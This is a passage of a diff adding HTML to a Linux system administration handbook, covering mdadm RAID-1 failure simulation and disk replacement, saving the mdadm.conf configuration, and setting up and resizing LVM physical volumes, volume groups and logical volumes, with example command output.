+                  class="para">
+					One might therefore wonder about the point of synchronizing both disks at creation time. Why care whether the contents are identical on zones of the volume that we know will only be read after we have written to them?
+				</div><div
+                  class="para">
+					Fortunately, this synchronization phase can be avoided by passing the <code
+                    class="literal">--assume-clean</code> option to <code
+                    class="command">mdadm</code>. However, this option can lead to surprises in cases where the initial data will be read (for instance if a filesystem is already present on the physical disks), which is why it isn't enabled by default.
+				</div></div><div
+                class="para">
+					Now let's see what happens when one of the elements of the RAID-1 array fails. <code
+                  class="command">mdadm</code>, in particular its <code
+                  class="literal">--fail</code> option, allows simulating such a disk failure:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm /dev/md1 --fail /dev/sde</code></strong>
+<code
+                  class="computeroutput">mdadm: set /dev/sde faulty in /dev/md1
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+    Update Time : Wed May  6 09:39:39 2015
+          State : clean, degraded 
+ Active Devices : 1
+Working Devices : 1
+ Failed Devices : 1
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 19
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       0        0        2      removed
+
+       1       8       64        -      faulty   /dev/sde</code></pre><div
+                class="para">
+					The contents of the volume are still accessible (and, if it is mounted, the applications don't notice a thing), but the data safety isn't assured anymore: should the <code
+                  class="filename">sdd</code> disk fail in turn, the data would be lost. We want to avoid that risk, so we'll replace the failed disk with a new one, <code
+                  class="filename">sdf</code>:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm /dev/md1 --add /dev/sdf</code></strong>
+<code
+                  class="computeroutput">mdadm: added /dev/sdf
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+   Raid Devices : 2
+  Total Devices : 3
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:48:49 2015
+          State : clean, degraded, recovering 
+ Active Devices : 1
+Working Devices : 2
+ Failed Devices : 1
+  Spare Devices : 1
+
+ Rebuild Status : 28% complete
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 26
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      spare rebuilding   /dev/sdf
+
+       1       8       64        -      faulty   /dev/sde
+# </code><strong
+                  class="userinput"><code>[...]</code></strong>
+<code
+                  class="computeroutput">[...]
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+    Update Time : Wed May  6 09:49:08 2015
+          State : clean 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 1
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 41
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      active sync   /dev/sdf
+
+       1       8       64        -      faulty   /dev/sde</code></pre><div
+                class="para">
+					Here again, the kernel automatically triggers a reconstruction phase during which the volume, although still accessible, is in a degraded mode. Once the reconstruction is over, the RAID array is back to a normal state. One can then tell the system that the <code
+                  class="filename">sde</code> disk is about to be removed from the array, so as to end up with a classical RAID mirror on two disks:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm /dev/md1 --remove /dev/sde</code></strong>
+<code
+                  class="computeroutput">mdadm: hot removed /dev/sde from /dev/md1
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      active sync   /dev/sdf</code></pre><div
+                class="para">
+					From then on, the drive can be physically removed when the server is next switched off, or even hot-removed when the hardware configuration allows hot-swap. Such configurations include some SCSI controllers, most SATA disks, and external drives operating on USB or Firewire.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.backup-raid-config"></a>12.1.1.3. Backing up the Configuration</h4></div></div></div><div
+                class="para">
+					Most of the meta-data concerning RAID volumes are saved directly on the disks that make up these arrays, so that the kernel can detect the arrays and their components and assemble them automatically when the system starts up. However, backing up this configuration is encouraged, because this detection isn't fail-proof, and it is only expected that it will fail precisely in sensitive circumstances. In our example, if the <code
+                  class="filename">sde</code> disk failure had been real (instead of simulated) and the system had been restarted without removing this <code
+                  class="filename">sde</code> disk, this disk could start working again due to having been probed during the reboot. The kernel would then have three physical elements, each claiming to contain half of the same RAID volume. Another source of confusion can come when RAID volumes from two servers are consolidated onto one server only. If these arrays were running normally before the disks were moved, the kernel would be able to detect and reassemble the pairs properly; but if the moved disks had been aggregated into an <code
+                  class="filename">md1</code> on the old server, and the new server already has an <code
+                  class="filename">md1</code>, one of the mirrors would be renamed.
+				</div><div
+                class="para">
+					Backing up the configuration is therefore important, if only for reference. The standard way to do it is by editing the <code
+                  class="filename">/etc/mdadm/mdadm.conf</code> file, an example of which is listed here:
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="example.mdadm-conf"></a><p
+                  class="title"><strong>Příklad 12.1. <code
+                      class="command">mdadm</code> configuration file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting"># mdadm.conf
+#
+# Please refer to mdadm.conf(5) for information about this file.
+#
+
+# by default (built-in), scan all partitions (/proc/partitions) and all
+# containers for MD superblocks. alternatively, specify devices to scan, using
+# wildcards if desired.
+DEVICE /dev/sd*
+
+# auto-create devices with Debian standard permissions
+CREATE owner=root group=disk mode=0660 auto=yes
+
+# automatically tag new arrays as belonging to the local system
+HOMEHOST &lt;system&gt;
+
+# instruct the monitoring daemon where to send mail alerts
+MAILADDR root
+
+# definitions of existing MD arrays
+ARRAY /dev/md0 metadata=1.2 name=mirwiz:0 UUID=bb085b35:28e821bd:20d697c9:650152bb
+ARRAY /dev/md1 metadata=1.2 name=mirwiz:1 UUID=6ec558ca:0c2c04a0:19bca283:95f67464
+
+# This configuration was auto-generated on Thu, 17 Jan 2013 16:21:01 +0100
+# by mkconf 3.2.5-3
+</pre></div></div><div
+                class="para">
+					One of the most useful details is the <code
+                  class="literal">DEVICE</code> option, which lists the devices where the system will automatically look for components of RAID volumes at start-up time. In our example, we replaced the default value, <code
+                  class="literal">partitions containers</code>, with an explicit list of device files, since we chose to use entire disks and not only partitions, for some volumes.
+				</div><div
+                class="para">
+					The last two lines in our example are those allowing the kernel to safely pick which volume number to assign to which array. The metadata stored on the disks themselves are enough to re-assemble the volumes, but not to determine the volume number (and the matching <code
+                  class="filename">/dev/md*</code> device name).
+				</div><div
+                class="para">
+					Fortunately, these lines can be generated automatically:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm --misc --detail --brief /dev/md?</code></strong>
+<code
+                  class="computeroutput">ARRAY /dev/md0 metadata=1.2 name=mirwiz:0 UUID=bb085b35:28e821bd:20d697c9:650152bb
+ARRAY /dev/md1 metadata=1.2 name=mirwiz:1 UUID=6ec558ca:0c2c04a0:19bca283:95f67464</code></pre><div
+                class="para">
+					The contents of these last two lines doesn't depend on the list of disks included in the volume. It is therefore not necessary to regenerate these lines when replacing a failed disk with a new one. On the other hand, care must be taken to update the file when creating or deleting a RAID array.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.lvm"></a>12.1.2. LVM</h3></div></div></div><a
+              id="id-1.15.4.7.2"
+              class="indexterm"></a><a
+              id="id-1.15.4.7.3"
+              class="indexterm"></a><div
+              class="para">
+				LVM, the <span
+                class="emphasis"><em>Logical Volume Manager</em></span>, is another approach to abstracting logical volumes from their physical supports, which focuses on increasing flexibility rather than increasing reliability. LVM allows changing a logical volume transparently as far as the applications are concerned; for instance, it is possible to add new disks, migrate the data to them, and remove the old disks, without unmounting the volume.
+			</div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.lvm-concepts"></a>12.1.2.1. LVM Concepts</h4></div></div></div><div
+                class="para">
+					This flexibility is attained by a level of abstraction involving three concepts.
+				</div><div
+                class="para">
+					First, the PV (<span
+                  class="emphasis"><em>Physical Volume</em></span>) is the entity closest to the hardware: it can be partitions on a disk, or a full disk, or even any other block device (including, for instance, a RAID array). Note that when a physical element is set up to be a PV for LVM, it should only be accessed via LVM, otherwise the system will get confused.
+				</div><div
+                class="para">
+					A number of PVs can be clustered in a VG (<span
+                  class="emphasis"><em>Volume Group</em></span>), which can be compared to disks both virtual and extensible. VGs are abstract, and don't appear in a device file in the <code
+                  class="filename">/dev</code> hierarchy, so there's no risk of using them directly.
+				</div><div
+                class="para">
+					The third kind of object is the LV (<span
+                  class="emphasis"><em>Logical Volume</em></span>), which is a chunk of a VG; if we keep the VG-as-disk analogy, the LV compares to a partition. The LV appears as a block device with an entry in <code
+                  class="filename">/dev</code>, and it can be used as any other physical partition can be (most commonly, to host a filesystem or swap space).
+				</div><div
+                class="para">
+					The important thing is that the splitting of a VG into LVs is entirely independent of its physical components (the PVs). A VG with only a single physical component (a disk for instance) can be split into a dozen logical volumes; similarly, a VG can use several physical disks and appear as a single large logical volume. The only constraint, obviously, is that the total size allocated to LVs can't be bigger than the total capacity of the PVs in the volume group.
+				</div><div
+                class="para">
+					It often makes sense, however, to have some kind of homogeneity among the physical components of a VG, and to split the VG into logical volumes that will have similar usage patterns. For instance, if the available hardware includes fast disks and slower disks, the fast ones could be clustered into one VG and the slower ones into another; chunks of the first one can then be assigned to applications requiring fast data access, while the second one will be kept for less demanding tasks.
+				</div><div
+                class="para">
+					In any case, keep in mind that an LV isn't particularly attached to any one PV. It is possible to influence where the data from an LV are physically stored, but this possibility isn't required for day-to-day use. On the contrary: when the set of physical components of a VG evolves, the physical storage locations corresponding to a particular LV can be migrated across disks (while staying within the PVs assigned to the VG, of course).
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.lvm-setup"></a>12.1.2.2. Setting up LVM</h4></div></div></div><div
+                class="para">
+					Let us now follow, step by step, the process of setting up LVM for a typical use case: we want to simplify a complex storage situation. Such a situation usually happens after some long and convoluted history of accumulated temporary measures. For the purposes of illustration, we'll consider a server where the storage needs have changed over time, ending up in a maze of available partitions split over several partially used disks. In more concrete terms, the following partitions are available:
+				</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+							on the <code
+                        class="filename">sdb</code> disk, a <code
+                        class="filename">sdb2</code> partition, 4 GB;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							on the <code
+                        class="filename">sdc</code> disk, a <code
+                        class="filename">sdc3</code> partition, 3 GB;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							the <code
+                        class="filename">sdd</code> disk, 4 GB, is fully available;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							on the <code
+                        class="filename">sdf</code> disk, a <code
+                        class="filename">sdf1</code> partition, 4 GB; and a <code
+                        class="filename">sdf2</code> partition, 5 GB.
+						</div></li></ul></div><div
+                class="para">
+					In addition, let's assume that disks <code
+                  class="filename">sdb</code> and <code
+                  class="filename">sdf</code> are faster than the other two.
+				</div><div
+                class="para">
+					Our goal is to set up three logical volumes for three different applications: a file server requiring 5 GB of storage space, a database (1 GB) and some space for back-ups (12 GB). The first two need good performance, but back-ups are less critical in terms of access speed. All these constraints prevent the use of partitions on their own; using LVM can abstract the physical size of the devices, so the only limit is the total available space.
+				</div><div
+                class="para">
+					The required tools are in the <span
+                  class="pkg pkg">lvm2</span> package and its dependencies. When they're installed, setting up LVM takes three steps, matching the three levels of concepts.
+				</div><div
+                class="para">
+					First, we prepare the physical volumes using <code
+                  class="command">pvcreate</code>:
+				</div><a
+                xmlns=""
+                id="screen.pvcreate"></a><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>pvdisplay</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>pvcreate /dev/sdb2</code></strong>
+<code
+                  class="computeroutput">  Physical volume "/dev/sdb2" successfully created
+# </code><strong
+                  class="userinput"><code>pvdisplay</code></strong>
+<code
+                  class="computeroutput">  "/dev/sdb2" is a new physical volume of "4.00 GiB"
+  --- NEW Physical volume ---
+  PV Name               /dev/sdb2
+  VG Name               
+  PV Size               4.00 GiB
+  Allocatable           NO
+  PE Size               0   
+  Total PE              0
+  Free PE               0
+  Allocated PE          0
+  PV UUID               0zuiQQ-j1Oe-P593-4tsN-9FGy-TY0d-Quz31I
+
+# </code><strong
+                  class="userinput"><code>for i in sdc3 sdd sdf1 sdf2 ; do pvcreate /dev/$i ; done</code></strong>
+<code
+                  class="computeroutput">  Physical volume "/dev/sdc3" successfully created
+  Physical volume "/dev/sdd" successfully created
+  Physical volume "/dev/sdf1" successfully created
+  Physical volume "/dev/sdf2" successfully created
+# </code><strong
+                  class="userinput"><code>pvdisplay -C</code></strong>
+<code
+                  class="computeroutput">  PV         VG   Fmt  Attr PSize PFree
+  /dev/sdb2       lvm2 ---  4.00g 4.00g
+  /dev/sdc3       lvm2 ---  3.09g 3.09g
+  /dev/sdd        lvm2 ---  4.00g 4.00g
+  /dev/sdf1       lvm2 ---  4.10g 4.10g
+  /dev/sdf2       lvm2 ---  5.22g 5.22g
+</code></pre><div
+                class="para">
+					So far, so good; note that a PV can be set up on a full disk as well as on individual partitions of it. As shown above, the <code
+                  class="command">pvdisplay</code> command lists the existing PVs, with two possible output formats.
+				</div><div
+                class="para">
+					Now let's assemble these physical elements into VGs using <code
+                  class="command">vgcreate</code>. We'll gather only PVs from the fast disks into a <code
+                  class="filename">vg_critical</code> VG; the other VG, <code
+                  class="filename">vg_normal</code>, will also include slower elements.
+				</div><a
+                xmlns=""
+                id="screen.vgcreate"></a><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>vgdisplay</code></strong>
+<code
+                  class="computeroutput">  No volume groups found
+# </code><strong
+                  class="userinput"><code>vgcreate vg_critical /dev/sdb2 /dev/sdf1</code></strong>
+<code
+                  class="computeroutput">  Volume group "vg_critical" successfully created
+# </code><strong
+                  class="userinput"><code>vgdisplay</code></strong>
+<code
+                  class="computeroutput">  --- Volume group ---
+  VG Name               vg_critical
+  System ID             
+  Format                lvm2
+  Metadata Areas        2
+  Metadata Sequence No  1
+  VG Access             read/write
+  VG Status             resizable
+  MAX LV                0
+  Cur LV                0
+  Open LV               0
+  Max PV                0
+  Cur PV                2
+  Act PV                2
+  VG Size               8.09 GiB
+  PE Size               4.00 MiB
+  Total PE              2071
+  Alloc PE / Size       0 / 0   
+  Free  PE / Size       2071 / 8.09 GiB
+  VG UUID               bpq7zO-PzPD-R7HW-V8eN-c10c-S32h-f6rKqp
+
+# </code><strong
+                  class="userinput"><code>vgcreate vg_normal /dev/sdc3 /dev/sdd /dev/sdf2</code></strong>
+<code
+                  class="computeroutput">  Volume group "vg_normal" successfully created
+# </code><strong
+                  class="userinput"><code>vgdisplay -C</code></strong>
+<code
+                  class="computeroutput">  VG          #PV #LV #SN Attr   VSize  VFree 
+  vg_critical   2   0   0 wz--n-  8.09g  8.09g
+  vg_normal     3   0   0 wz--n- 12.30g 12.30g
+</code></pre><div
+                class="para">
+					Here again, commands are rather straightforward (and <code
+                  class="command">vgdisplay</code> proposes two output formats). Note that it is quite possible to use two partitions of the same physical disk into two different VGs. Note also that we used a <code
+                  class="filename">vg_</code> prefix to name our VGs, but it is nothing more than a convention.
+				</div><div
+                class="para">
+					We now have two “virtual disks”, sized about 8 GB and 12 GB, respectively. Let's now carve them up into “virtual partitions” (LVs). This involves the <code
+                  class="command">lvcreate</code> command, and a slightly more complex syntax:
+				</div><a
+                xmlns=""
+                id="screen.lvcreate"></a><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>lvdisplay</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>lvcreate -n lv_files -L 5G vg_critical</code></strong>
+<code
+                  class="computeroutput">  Logical volume "lv_files" created
+# </code><strong
+                  class="userinput"><code>lvdisplay</code></strong>
+<code
+                  class="computeroutput">  --- Logical volume ---
+  LV Path                /dev/vg_critical/lv_files
+  LV Name                lv_files
+  VG Name                vg_critical
+  LV UUID                J3V0oE-cBYO-KyDe-5e0m-3f70-nv0S-kCWbpT
+  LV Write Access        read/write
+  LV Creation host, time mirwiz, 2015-06-10 06:10:50 -0400
+  LV Status              available
+  # open                 0
+  LV Size                5.00 GiB
+  Current LE             1280
+  Segments               2
+  Allocation             inherit
+  Read ahead sectors     auto
+  - currently set to     256
+  Block device           253:0
+
+# </code><strong
+                  class="userinput"><code>lvcreate -n lv_base -L 1G vg_critical</code></strong>
+<code
+                  class="computeroutput">  Logical volume "lv_base" created
+# </code><strong
+                  class="userinput"><code>lvcreate -n lv_backups -L 12G vg_normal</code></strong>
+<code
+                  class="computeroutput">  Logical volume "lv_backups" created
+# </code><strong
+                  class="userinput"><code>lvdisplay -C</code></strong>
+<code
+                  class="computeroutput">  LV         VG          Attr     LSize  Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_base    vg_critical -wi-a---  1.00g                                           
+  lv_files   vg_critical -wi-a---  5.00g                                           
+  lv_backups vg_normal   -wi-a--- 12.00g</code></pre><div
+                class="para">
+					Two parameters are required when creating logical volumes; they must be passed to the <code
+                  class="command">lvcreate</code> as options. The name of the LV to be created is specified with the <code
+                  class="literal">-n</code> option, and its size is generally given using the <code
+                  class="literal">-L</code> option. We also need to tell the command what VG to operate on, of course, hence the last parameter on the command line.
+				</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>GOING FURTHER</em></span> <code
+                            class="command">lvcreate</code> options</strong></p></div></div></div><div
+                  class="para">
+					The <code
+                    class="command">lvcreate</code> command has several options to allow tweaking how the LV is created.
+				</div><div
+                  class="para">
+					Let's first describe the <code
+                    class="literal">-l</code> option, with which the LV's size can be given as a number of blocks (as opposed to the “human” units we used above). These blocks (called PEs, <span
+                    class="emphasis"><em>physical extents</em></span>, in LVM terms) are contiguous units of storage space in PVs, and they can't be split across LVs. When one wants to define storage space for an LV with some precision, for instance to use the full available space, the <code
+                    class="literal">-l</code> option will probably be preferred over <code
+                    class="literal">-L</code>.
+				</div><div
+                  class="para">
+					It's also possible to hint at the physical location of an LV, so that its extents are stored on a particular PV (while staying within the ones assigned to the VG, of course). Since we know that <code
+                    class="filename">sdb</code> is faster than <code
+                    class="filename">sdf</code>, we may want to store the <code
+                    class="filename">lv_base</code> there if we want to give an advantage to the database server compared to the file server. The command line becomes: <code
+                    class="command">lvcreate -n lv_base -L 1G vg_critical /dev/sdb2</code>. Note that this command can fail if the PV doesn't have enough free extents. In our example, we would probably have to create <code
+                    class="filename">lv_base</code> before <code
+                    class="filename">lv_files</code> to avoid this situation – or free up some space on <code
+                    class="filename">sdb2</code> with the <code
+                    class="command">pvmove</code> command.
+				</div></div><div
+                class="para">
+					Logical volumes, once created, end up as block device files in <code
+                  class="filename">/dev/mapper/</code>:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>ls -l /dev/mapper</code></strong>
+<code
+                  class="computeroutput">total 0
+crw------- 1 root root 10, 236 Jun 10 16:52 control
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_critical-lv_base -&gt; ../dm-1
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_critical-lv_files -&gt; ../dm-0
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_normal-lv_backups -&gt; ../dm-2
+# </code><strong
+                  class="userinput"><code>ls -l /dev/dm-*</code></strong>
+<code
+                  class="computeroutput">brw-rw---T 1 root disk 253, 0 Jun 10 17:05 /dev/dm-0
+brw-rw---- 1 root disk 253, 1 Jun 10 17:05 /dev/dm-1
+brw-rw---- 1 root disk 253, 2 Jun 10 17:05 /dev/dm-2
+</code></pre><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>NOTE</em></span> Autodetecting LVM volumes</strong></p></div></div></div><div
+                  class="para">
+					When the computer boots, the <code
+                    class="filename">lvm2-activation</code> systemd service unit executes <code
+                    class="command">vgchange -aay</code> to “activate” the volume groups: it scans the available devices; those that have been initialized as physical volumes for LVM are registered into the LVM subsystem, those that belong to volume groups are assembled, and the relevant logical volumes are started and made available. There is therefore no need to edit configuration files when creating or modifying LVM volumes.
+				</div><div
+                  class="para">
+					Note, however, that the layout of the LVM elements (physical and logical volumes, and volume groups) is backed up in <code
+                    class="filename">/etc/lvm/backup</code>, which can be useful in case of a problem (or just to sneak a peek under the hood).
+				</div></div><div
+                class="para">
+					To make things easier, convenience symbolic links are also created in directories matching the VGs:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>ls -l /dev/vg_critical</code></strong>
+<code
+                  class="computeroutput">total 0
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_base -&gt; ../dm-1
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_files -&gt; ../dm-0
+# </code><strong
+                  class="userinput"><code>ls -l /dev/vg_normal</code></strong>
+<code
+                  class="computeroutput">total 0
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_backups -&gt; ../dm-2</code></pre><div
+                class="para">
+					The LVs can then be used exactly like standard partitions:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mkfs.ext4 /dev/vg_normal/lv_backups</code></strong>
+<code
+                  class="computeroutput">mke2fs 1.42.12 (29-Aug-2014)
+Creating filesystem with 3145728 4k blocks and 786432 inodes
+Filesystem UUID: b5236976-e0e2-462e-81f5-0ae835ddab1d
+[...]
+Creating journal (32768 blocks): done
+Writing superblocks and filesystem accounting information: done 
+# </code><strong
+                  class="userinput"><code>mkdir /srv/backups</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mount /dev/vg_normal/lv_backups /srv/backups</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>df -h /srv/backups</code></strong>
+<code
+                  class="computeroutput">Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_normal-lv_backups   12G   30M   12G   1% /srv/backups
+# </code><strong
+                  class="userinput"><code>[...]</code></strong>
+<code
+                  class="computeroutput">[...]
+# </code><strong
+                  class="userinput"><code>cat /etc/fstab</code></strong>
+<code
+                  class="computeroutput">[...]
+/dev/vg_critical/lv_base    /srv/base       ext4 defaults 0 2
+/dev/vg_critical/lv_files   /srv/files      ext4 defaults 0 2
+/dev/vg_normal/lv_backups   /srv/backups    ext4 defaults 0 2</code></pre><div
+                class="para">
+					From the applications' point of view, the myriad small partitions have now been abstracted into one large 12 GB volume, with a friendlier name.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.lvm-over-time"></a>12.1.2.3. LVM Over Time</h4></div></div></div><div
+                class="para">
+					Even though the ability to aggregate partitions or physical disks is convenient, this is not the main advantage brought by LVM. The flexibility it brings is especially noticed as time passes, when needs evolve. In our example, let's assume that new large files must be stored, and that the LV dedicated to the file server is too small to contain them. Since we haven't used the whole space available in <code
+                  class="filename">vg_critical</code>, we can grow <code
+                  class="filename">lv_files</code>. For that purpose, we'll use the <code
+                  class="command">lvresize</code> command, then <code
+                  class="command">resize2fs</code> to adapt the filesystem accordingly:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>df -h /srv/files/</code></strong>
+<code
+                  class="computeroutput">Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_files  5.0G  4.6G  146M  97% /srv/files
+# </code><strong
+                  class="userinput"><code>lvdisplay -C vg_critical/lv_files</code></strong>
+<code
+                  class="computeroutput">  LV       VG          Attr     LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_files vg_critical -wi-ao-- 5.00g
+# </code><strong
+                  class="userinput"><code>vgdisplay -C vg_critical</code></strong>
+<code
+                  class="computeroutput">  VG          #PV #LV #SN Attr   VSize VFree
+  vg_critical   2   2   0 wz--n- 8.09g 2.09g
+# </code><strong
+                  class="userinput"><code>lvresize -L 7G vg_critical/lv_files</code></strong>
+<code
+                  class="computeroutput">  Size of logical volume vg_critical/lv_files changed from 5.00 GiB (1280 extents) to 7.00 GiB (1792 extents).
+  Logical volume lv_files successfully resized
+# </code><strong
+                  class="userinput"><code>lvdisplay -C vg_critical/lv_files</code></strong>
+<code
+                  class="computeroutput">  LV       VG          Attr     LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_files vg_critical -wi-ao-- 7.00g
+# </code><strong
+                  class="userinput"><code>resize2fs /dev/vg_critical/lv_files</code></strong>
+<code
+                  class="computeroutput">resize2fs 1.42.12 (29-Aug-2014)
+Filesystem at /dev/vg_critical/lv_files is mounted on /srv/files; on-line resizing required
+old_desc_blocks = 1, new_desc_blocks = 1
+The filesystem on /dev/vg_critical/lv_files is now 1835008 (4k) blocks long.
+
+# </code><strong
+                  class="userinput"><code>df -h /srv/files/</code></strong>
+<code
+                  class="computeroutput">Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_files  6.9G  4.6G  2.1G  70% /srv/files</code></pre><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>CAUTION</em></span> Resizing filesystems</strong></p></div></div></div><div
+                  class="para">
+					Not all filesystems can be resized online; resizing a volume can therefore require unmounting the filesystem first and remounting it afterwards. Of course, if one wants to shrink the space allocated to an LV, the filesystem must be shrunk first; the order is reversed when the resizing goes in the other direction: the logical volume must be grown before the filesystem on it. It's rather straightforward, since at no time must the filesystem size be larger than the block device where it resides (whether that device is a physical partition or a logical volume).
+				</div><div
+                  class="para">
+					The ext3, ext4 and xfs filesystems can be grown online, without unmounting; shrinking requires an unmount. The reiserfs filesystem allows online resizing in both directions. The venerable ext2 allows neither, and always requires unmounting.
+				</div></div><div
+                class="para">
+					We could proceed in a similar fashion to extend the volume hosting the database, only we've reached the VG's available space limit:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>df -h /srv/base/</code></strong>
+<code
+                  class="computeroutput">Filesystem                       Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_base 1008M  854M  104M  90% /srv/base
+# </code><strong
+                  class="userinput"><code>vgdisplay -C vg_critical</code></strong>
+<code
+                  class="computeroutput">  VG          #PV #LV #SN Attr   VSize VFree 
+  vg_critical   2   2   0 wz--n- 8.09g 92.00m</code></pre><div
+                class="para">
+					No matter, since LVM allows adding physical volumes to existing volume groups. For instance, maybe we've noticed that the <code
+                  class="filename">sdb1</code> partition, which was so far used outside of LVM, only contained archives that could be moved to <code
+                  class="filename">lv_backups</code>. We can now recycle it and integrate it to the volume group, and thereby reclaim some available space. This is the purpose of the <code
+                  class="command">vgextend</code> command. Of course, the partition must be prepared as a physical volume beforehand. Once the VG has been extended, we can use similar commands as previously to grow the logical volume then the filesystem:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>pvcreate /dev/sdb1</code></strong>
+<code
+                  class="computeroutput">  Physical volume "/dev/sdb1" successfully created
+# </code><strong
+                  class="userinput"><code>vgextend vg_critical /dev/sdb1</code></strong>
+<code
+                  class="computeroutput">  Volume group "vg_critical" successfully extended
+# </code><strong
+                  class="userinput"><code>vgdisplay -C vg_critical</code></strong>
+<code
+                  class="computeroutput">  VG          #PV #LV #SN Attr   VSize VFree
+  vg_critical   3   2   0 wz--n- 9.09g 1.09g
+# </code><strong
+                  class="userinput"><code>[...]</code></strong>
+<code
+                  class="computeroutput">[...]
+# </code><strong
+                  class="userinput"><code>df -h /srv/base/</code></strong>
+<code
+                  class="computeroutput">Filesystem                       Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_base  2.0G  854M  1.1G  45% /srv/base</code></pre><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>GOING FURTHER</em></span> Advanced LVM</strong></p></div></div></div><div
+                  class="para">
+					LVM also caters for more advanced uses, where many details can be specified by hand. For instance, an administrator can tweak the size of the blocks that make up physical and logical volumes, as well as their physical layout. It is also possible to move blocks across PVs, for instance to fine-tune performance or, in a more mundane way, to free a PV when one needs to extract the corresponding physical disk from the VG (whether to affect it to another VG or to remove it from LVM altogether). The manual pages describing the commands are generally clear and detailed. A good entry point is the <span
+                    class="citerefentry"><span
+                      class="refentrytitle">lvm</span>(8)</span> manual page.
+				</div></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.raid-or-lvm"></a>12.1.3. RAID or LVM?</h3></div></div></div><div
+              class="para">
